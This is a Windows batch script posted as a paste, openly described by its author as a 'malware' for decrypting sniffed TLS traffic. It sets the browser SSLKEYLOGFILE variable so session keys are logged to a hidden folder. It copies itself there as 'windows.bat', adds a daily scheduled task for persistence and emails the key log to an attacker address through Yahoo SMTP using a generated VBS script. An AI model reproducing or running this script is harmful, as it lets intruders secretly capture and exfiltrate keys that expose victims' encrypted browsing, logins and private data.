SHOW:
|
|
- or go back to the newest paste.
1 | :: Decrypt #TLS & #SSL sniffed traffic via SSLKEYLOGFILE feature of Chrome and Firefox, using my tiny "malware" ! | |
2 | :: http://www.sans.org/reading-room/whitepapers/authentication/ssl-tls-whats-hood-34297 | |
3 | :: Tested on Windows 7 about a year ago | |
4 | ||
5 | @echo off | |
6 | setlocal | |
7 | ||
8 | mkdir c:\windows_files | |
9 | echo. 2> c:\windows_files\premaster.txt | |
10 | setx SSLKEYLOGFILE "c:\windows_files\premaster.txt" | |
11 | ||
12 | copy %0 "c:\windows_files\windows.bat" > nul | |
13 | ||
14 | SchTasks /Create /SC DAILY /TN βMYβ /TR βC:\windows_files\windows.batβ /ST 09:00 | |
15 | ||
16 | ||
17 | :: use these settings to send from a gmail account | |
18 | :: set port=465 and set SSL=True | |
19 | ||
20 | :: use these settings for standard email SMTP port and no encryption | |
21 | :: set port=25 and set SSL=False | |
22 | ||
23 | :: Change these following items to use the same variables all the time | |
24 | :: or use the command line to pass all the variables | |
25 | ||
26 | set Port=465 | |
27 | set SSL=True | |
28 | set From="attacker@yahoo.com" | |
29 | set To="attacker@eyahoo.com" | |
30 | set Subject="Subject line" | |
31 | set Body="Email Body in one line" | |
32 | set SMTPServer="smtp.mail.yahoo.com" | |
33 | set User="attacker_yahoo_username" | |
34 | set Pass="attacker_yahoo_password" | |
35 | set fileattach="c:\windows_files\premaster.txt" | |
36 | ||
37 | ||
38 | :: This section sets the command line arguments | |
39 | ||
40 | ||
41 | if "%~7" NEQ "" ( | |
42 | set From="%~1" | |
43 | set To="%~2" | |
44 | set Subject="%~3" | |
45 | set Body="%~4" | |
46 | set SMTPServer="%~5" | |
47 | set User="%~6" | |
48 | set Pass="%~7" | |
49 | set fileattach="%~8" | |
50 | ) | |
51 | ||
52 | set "vbsfile=%temp%\email-bat.vbs" | |
53 | del "%vbsfile%" 2>nul | |
54 | set cdoSchema=http://schemas.microsoft.com/cdo/configuration | |
55 | echo >>"%vbsfile%" Set objArgs = WScript.Arguments | |
56 | echo >>"%vbsfile%" Set objEmail = CreateObject("CDO.Message") | |
57 | echo >>"%vbsfile%" objEmail.From = %From% | |
58 | echo >>"%vbsfile%" objEmail.To = %To% | |
59 | echo >>"%vbsfile%" objEmail.Subject = %Subject% | |
60 | echo >>"%vbsfile%" objEmail.Textbody = %body% | |
61 | if exist %fileattach% echo >>"%vbsfile%" objEmail.AddAttachment %fileattach% | |
62 | echo >>"%vbsfile%" with objEmail.Configuration.Fields | |
63 | echo >>"%vbsfile%" .Item ("%cdoSchema%/sendusing") = 2 ' not local, smtp | |
64 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpserver") = %SMTPServer% | |
65 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpserverport") = %port% | |
66 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpauthenticate") = 1 ' cdobasic | |
67 | echo >>"%vbsfile%" .Item ("%cdoSchema%/sendusername") = %user% | |
68 | echo >>"%vbsfile%" .Item ("%cdoSchema%/sendpassword") = %pass% | |
69 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpusessl") = %SSL% | |
70 | echo >>"%vbsfile%" .Item ("%cdoSchema%/smtpconnectiontimeout") = 30 | |
71 | echo >>"%vbsfile%" .Update | |
72 | echo >>"%vbsfile%" end with | |
73 | echo >>"%vbsfile%" objEmail.Send | |
74 | ||
75 | cscript.exe /nologo "%vbsfile%" | |
76 | echo email sent (if variables were correct) |